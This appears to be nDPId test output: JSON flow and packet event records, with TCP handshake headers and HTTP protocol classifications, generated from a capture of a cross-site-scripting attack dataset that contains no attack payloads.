+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2196,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":2,"flow_last_seen":1499347230690,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347230690,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1shnmPeomyhT76AScSCSVwAAAgQFtAQCCAoD47o6ATnowwEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2197,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":3,"flow_last_seen":1499347230691,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347230691,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0uy5AAD4GCqqsEAABwKgKMtbIAFCbKFPvZ5j3qYAQAOUxXgAAAQEICgE56MQD47o6"} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2204,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347228091,"flow_last_seen":1499347231733,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347231733,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54956,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347098746,"flow_last_seen":1499347104641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53598,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347098746,"flow_last_seen":1499347104641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53598,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347101314,"flow_last_seen":1499347106642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53624,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347101314,"flow_last_seen":1499347106642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53624,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347102609,"flow_last_seen":1499347107642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53638,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347102609,"flow_last_seen":1499347107642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53638,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347105154,"flow_last_seen":1499347110642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53664,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347105154,"flow_last_seen":1499347110642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53664,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347106438,"flow_last_seen":1499347111642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53678,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347106438,"flow_last_seen":1499347111642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53678,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2214,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347233219,"flow_last_seen":1499347233219,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347233219,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55010,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2214,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":1,"flow_last_seen":1499347233219,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347233219,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Fw9AAD4GrsGsEAABwKgKMtbiAFBsKfwzAAAAAKACchAy\/gAAAgQFtAQCCAoBOes8AAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2215,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":2,"flow_last_seen":1499347233219,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347233219,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1uJkUL6IbCn8NKAScSBQbgAAAgQFtAQCCAoD47yyATnrPAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2216,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":3,"flow_last_seen":1499347233220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347233220,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0FxBAAD4GrsisEAABwKgKMtbiAFBsKfw0ZFC+iYAQAOXvdQAAAQEICgE56zwD47yy"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347234469,"flow_last_seen":1499347234469,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347234469,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55024,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":1,"flow_last_seen":1499347234469,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347234469,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vaZAAD4GCCqsEAABwKgKMtbwAFD38VHSAAAAAKACchBQUQAAAgQFtAQCCAoBOex0AAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2224,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":2,"flow_last_seen":1499347234469,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347234469,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1vAPBPjT9\/FR06AScSCHigAAAgQFtAQCCAoD473qATnsdAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2225,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":3,"flow_last_seen":1499347234470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347234470,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vadAAD4GCDGsEAABwKgKMtbwAFD38VHTDwT41IAQAOUmkgAAAQEICgE57HQD473q"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2235,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347235716,"flow_last_seen":1499347235716,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347235716,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55038,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2235,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":1,"flow_last_seen":1499347235716,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347235716,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8wLxAAD4GBRSsEAABwKgKMtb+AFAtaC0QAAAAAKACchA+VwAAAgQFtAQCCAoBOe2sAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2236,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":2,"flow_last_seen":1499347235716,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347235716,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1v760xqZLWgtEaAScSBmwwAAAgQFtAQCCAoD478iATntrAEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2237,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":3,"flow_last_seen":1499347235717,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347235717,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0wL1AAD4GBRusEAABwKgKMtb+AFAtaC0R+tMamoAQAOUFywAAAQEICgE57awD478i"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2253,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347238260,"flow_last_seen":1499347238260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347238260,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55064,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2253,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":1,"flow_last_seen":1499347238260,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347238260,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8N5lAAD4GjjesEAABwKgKMtcYAFCMG8exAAAAAKACchBCbAAAAgQFtAQCCAoBOfAoAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2254,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":2,"flow_last_seen":1499347238260,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347238260,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1xiQuLeAjBvHsqAScSA1kAAAAgQFtAQCCAoD48GeATnwKAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2255,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":3,"flow_last_seen":1499347238261,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347238261,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0N5pAAD4Gjj6sEAABwKgKMtcYAFCMG8eykLi3gYAQAOXUlwAAAQEICgE58CgD48Ge"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2265,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347239517,"flow_last_seen":1499347239517,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347239517,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55078,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2265,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":1,"flow_last_seen":1499347239517,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347239517,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8d9VAAD4GTfusEAABwKgKMtcmAFDWiYa3AAAAAKACchA3sAAAAgQFtAQCCAoBOfFiAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2266,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":2,"flow_last_seen":1499347239517,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347239517,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1yYFUEfr1omGuKAScSAkmAAAAgQFtAQCCAoD48LYATnxYgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2267,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":3,"flow_last_seen":1499347239518,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347239518,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0d9ZAAD4GTgKsEAABwKgKMtcmAFDWiYa4BVBH7IAQAOXDnwAAAQEICgE58WID48LY"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2277,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347240786,"flow_last_seen":1499347240786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347240786,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55092,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2277,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":1,"flow_last_seen":1499347240786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347240786,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LjpAAD4Gl5asEAABwKgKMtc0AFB5mNylAAAAAKACchA9aAAAAgQFtAQCCAoBOfKfAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2278,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":2,"flow_last_seen":1499347240786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347240786,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1zRt9KwCeZjcpqAScSBcVgAAAgQFtAQCCAoD48QWATnynwEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2279,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":3,"flow_last_seen":1499347240787,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347240787,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0LjtAAD4Gl52sEAABwKgKMtc0AFB5mNymbfSsA4AQAOX7XAAAAQEICgE58qAD48QW"} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347107719,"flow_last_seen":1499347113642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347242051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53692,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347107719,"flow_last_seen":1499347113642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347242051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53692,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347110266,"flow_last_seen":1499347115643,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347242051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53718,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347110266,"flow_last_seen":1499347115643,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347242051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53718,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347111565,"flow_last_seen":1499347116643,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347242051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53732,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347111565,"flow_last_seen":1499347116643,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347242051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53732,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347114111,"flow_last_seen":1499347119643,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347242051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53758,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347114111,"flow_last_seen":1499347119643,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347242051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53758,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
